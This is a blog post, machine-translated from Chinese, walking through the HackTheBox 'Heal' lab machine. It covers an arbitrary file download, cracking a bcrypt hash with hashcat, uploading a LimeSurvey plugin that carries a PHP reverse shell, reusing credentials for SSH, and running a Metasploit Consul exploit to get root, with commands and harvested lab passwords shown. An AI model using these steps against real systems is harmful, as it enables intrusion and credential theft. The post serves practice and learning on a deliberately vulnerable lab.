Virts

Virts

私は可愛いです 🥰 お金をください ❤️
telegram
github
email
steam
douban
HomeArchives

HackTheBox [Heal] WriteUp

97
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The task involves exploiting a web application on HackTheBox called "Heal." After scanning the server, the attacker discovers open ports 80 and 22. Accessing the web page reveals a survey form and an API endpoint. A vulnerability in the PDF export feature allows for arbitrary file downloads, leading to the discovery of a database configuration file that reveals a SQLite database. The attacker retrieves a hashed password for a user named Ralph, which is cracked to reveal the password "147258369." Using this password, the attacker logs into the admin panel and executes a remote code execution (RCE) exploit by modifying a plugin. This grants access to a shell as the `www-data` user. The attacker then retrieves database credentials from the LimeSurvey configuration and uses them to log in as another user, Ron, via SSH. Further privilege escalation is achieved by identifying an open Consul service on port 8500, which has a known RCE vulnerability. The attacker exploits this vulnerability using Metasploit, ultimately gaining root access and capturing the root flag.

image

GetShell#

First, obtain the IP, scan the ports, and find that 80 and 22 are open.

Access port 80, which redirects to http://heal.htb, a web page for filling out a questionnaire. While accessing the page, it was found that there are requests to http://api.heal.htb and http://take-survey.heal.htb, and this is the asset information available.

Testing the functionality, it was discovered that there is arbitrary file download at the export PDF section.

image
Found two users ron and ralph.

At the same time, it was previously collected that api.heal.htb is based on the Ruby on Rails web framework. Checking the official documentation, it was found that the database configuration file is located at config/database.yml.

Continuing to exploit the vulnerability, the database configuration information was found.

image

It was found to be an SQLite database, which can be directly accessed to download storage/development.sqlite3.

Opening the database, user information was found.

image
Inside, there is the password hash for the ralph user. Using hashid to determine the type of hash.

echo '$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG' | hashid
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt

It was found to be the very slow-to-crack bcrypt, but this challenge is quite lenient, as it can be cracked with a small dictionary, no need for rockyou.

hashcat -m 3200 test.hash password.txt --show
$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG:147258369

Classic 147258369.

Access http://take-survey.heal.htb/index.php/admin, log in to the backend with the account ralph and password 147258369, and then it's the familiar backend GetShell phase.

Found an RCE PoC on GitHub, but exploit.py cannot be run directly and needs to be modified manually.

First, download Y1LD1R1M.zip, unzip it, and then modify the config.xml file inside.

<compatibility>
        <version>3.0</version>
        <version>4.0</version>
        <version>5.0</version>
        <version>6.0</version>
        <version>7.0</version>
        <version>8.0</version>
</compatibility>

Add a few lines of version numbers to make the version compatible; if not modified, it will fail to import due to the plugin version being too old.

Also, modify the php-rev.php file to change the IP and port to your own listening reverse shell port.

After modification, repackage it into a zip file and upload the ZIP archive in the Plugins configuration section. After uploading, start nc listening, and then access this address:

http://take-survey.heal.htb/upload/plugins/Y1LD1R1M/php-rev.php

Successfully obtained a reverse shell as the www-data user and checked the LimeSurvey configuration information.

cat /var/www/limesurvey/application/config/config.php

array(
	'connectionString' => 'pgsql:host=localhost;port=5432;user=db_user;password=AdmiDi0_pA$$w0rd;dbname=survey;',
	'emulatePrepare' => true,
	'username' => 'db_user',
	'password' => 'AdmiDi0_pA$$w0rd',
	'charset' => 'utf8',
	'tablePrefix' => 'lime_',
)

Using this password to brute-force the SSH user ron, successfully logged in and obtained a user shell.

Privilege Escalation#

Using ss to gather open ports.

ss -tulnp

Found that many ports are open, and testing had to be done one by one. Testing revealed that port 8500 has a web service.

sshpass -p 'AdmiDi0_pA$$w0rd' ssh -L 8000:127.0.0.1:8500 [email protected] -N

It is a Consul service; Google revealed an RCE. First, access http://localhost:8000/v1/agent/self and verify that the EnableRemoteScriptChecks option is true. There is a high probability of a vulnerability, so we can go directly to MSF.

msfconsole
use exploit/multi/misc/consul_service_exec
set RHOSTS 127.0.0.1
set RPORT 8000
set LHOST 10.10.14.53
run

Successfully popped a shell and obtained the root flag.

image

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.